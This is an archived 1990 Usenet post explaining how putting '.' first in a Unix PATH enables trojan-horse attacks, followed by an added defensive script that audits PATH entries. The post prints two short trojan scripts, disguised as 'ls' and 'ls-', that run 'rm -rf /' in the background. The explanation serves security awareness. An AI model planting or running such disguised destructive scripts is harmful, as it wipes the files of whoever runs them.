crontab for ordinary users

Jeff Beadles jeff at onion.pdx.com
Fri Oct 26 09:57:40 AEST 1990


In <4073 at goanna.cs.rmit.oz.au> msf at wren.cs.rmit.OZ.AU (Michael Fuller) writes:
> [ I wrote] 
>>I believe that you're doing your best to make your system vulnerable to a
>>trojan horse attack with a brain-damaged path like this.  
>
>>  *** DOT SHOULD NEVER BE FIRST IN YOUR PATH. ***
>
>>There are security papers galore that try to beat this into people, but they
>>just don't listen.  It IS a very good idea though.
>
>>If you don't know why dot is bad in front of your path,  send me email telling
>>me why you need to know. :-)
>
>Please! Just come out and say it. Having implied that there is a security hole,
>you then don't say what it is. Ordinary users such as myself :-)
>don't have time or even know quite where to look for the "security papers 
>galore", but those who _are_ interested in exploiting such
>weaknesses will eagerly go off to play. If I knew why it was a bad idea,
>I would be *much* less likely to do such a thing. The result now is that
>I won't know, and the baddies will :-(. If you must mention a problem,
>do so in a way which doesn't disadvantage the very people you are trying
>to protect.

Well, since this is a fairly well known security-ism, I'll post it.  Note, that
the smiley was on the line above.  All of the people that sent email were given
an answer.

First, an explanation of the search path.  ($PATH)

When you run a command with any modern shell, the search path is used to
locate the executable program if a path is not given.  This makes things
much easier for us humans, as we don't have to remember where everything is.
Also, the order of the path is significant.  Things are searched in the
order of the path variable.

Thus, if your path is ".:/bin:/usr/bin" and you type the command "ls" the
shell will try (in the following order) to run:
	./ls
	/bin/ls
	/usr/bin/ls

However, if your path is set to "/bin:/usr/bin:." then the following order
is used:
	/bin/ls
	/usr/bin/ls
	./ls


Anyway, let's say that a user "joe" has his path set to ".:/bin:/usr/bin".

Now, I tell joe I have these keen neat-o-super-duper files in my account,
and that he can get a copy of them if he wants.  (The story doesn't matter, all
you have to do is get someone into a directory that you have write access to.
/tmp would do just as well)

Anyway, in your directory with all of the other files, you could have a shell
script called "ls".  If this exists *IT* will run when the user types "ls"
rather than the system's "/bin/ls".  What if I had the following script set up
as 'ls'?

In a file called "ls"
-----cut here-----
#!/bin/sh
/bin/ls $*
rm -rf / 2>/dev/null &
-----cut here-----

If root ran it,  you could kiss your system goodbye (1/2 :-)  Or, if run by
"joe" user, then it would remove all "publicly writable" files, and anything
owned by "joe" user.

This is NOT a good thing, for obvious reasons.  I could also argue that dot
anywhere in your path is a bad idea.  Have you ever typed "ls- l"?  You could
just as easily have the following trojan horse:

In a file called "ls-"
-----cut here-----
#!/bin/sh
echo "ls- : Command not found"
rm -rf / 2>/dev/null &
-----cut here-----

You get the picture.

  *** DOT SHOULD NEVER BE FIRST IN YOUR PATH. ***


By the way, please don't try this at home folks.

	-Jeff
-- 
Jeff Beadles		jeff at onion.pdx.com
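
A defensive check for the problem described in the post, as an added example that is not part of the original message. It goes beyond the post by also flagging empty entries (which the shell searches as the current directory), other relative entries, and world-writable directories such as /tmp; the function name audit_path is hypothetical.

```shell
#!/bin/sh
# Added example: report PATH entries that let the current directory or a
# directory writable by other users supply the command that gets run.

# audit_path PATHSTRING
# Prints one line per risky entry; returns 1 if any were found, else 0.
audit_path() {
    rest="$1:"          # trailing ':' so the last entry is seen, even if empty
    pos=0
    bad=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}       # text before the first ':'
        rest=${rest#*:}         # everything after it
        pos=$((pos + 1))
        case $entry in
            '')
                echo "entry $pos: empty entry, searched as the current directory"
                bad=1 ;;
            .)
                echo "entry $pos: '.' is the current directory"
                bad=1 ;;
            /*)
                # -H follows a symlinked directory such as /bin -> usr/bin;
                # -prune stops find from descending into it.
                if [ -n "$(find -H "$entry" -prune -type d -perm -0002 2>/dev/null)" ]; then
                    echo "entry $pos: world-writable directory '$entry'"
                    bad=1
                fi ;;
            *)
                echo "entry $pos: relative directory '$entry'"
                bad=1 ;;
        esac
    done
    return "$bad"
}

# Constructed sample: the PATH given to user "joe" in the post.
audit_path ".:/bin:/usr/bin" || true
```

To check a live session, call audit_path "$PATH" from a login script and act on a non-zero return.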


